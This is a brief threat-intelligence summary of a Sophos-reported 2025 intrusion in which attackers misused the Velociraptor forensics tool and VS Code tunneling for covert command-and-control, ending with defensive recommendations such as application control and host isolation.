Attackers have begun abusing the legitimate Velociraptor DFIR tool to silently deploy Visual Studio Code’s tunneling feature as a covert command‑and‑control channel, with Sophos’ Counter Threat Unit detailing an August 2025 intrusion where Velociraptor was installed via msiexec from a Cloudflare Workers domain and then used to fetch and run VS Code with tunneling enabled, likely to reach an attacker‑controlled C2 endpoint; the activity triggered Taegis alerts and swift host isolation that likely prevented ransomware deployment. The campaign’s tradecraft aligns with a broader 2025 trend of social engineering and IT‑support impersonation on Microsoft Teams, where threat actors coax users into enabling remote assistance or running scripts, bypassing email defenses and accelerating privilege escalation and persistence, as documented in multiple April–August 2025 reports and incident summaries. Investigators note the staging of tools (e.g., Cloudflare tunnel, Radmin) and service‑based persistence for code.exe, urging continuous monitoring for unauthorized Velociraptor use, strict application control, EDR‑backed anomaly detection, and rapid isolation to disrupt ransomware precursors observed in late August 2025 advisories and news roundups.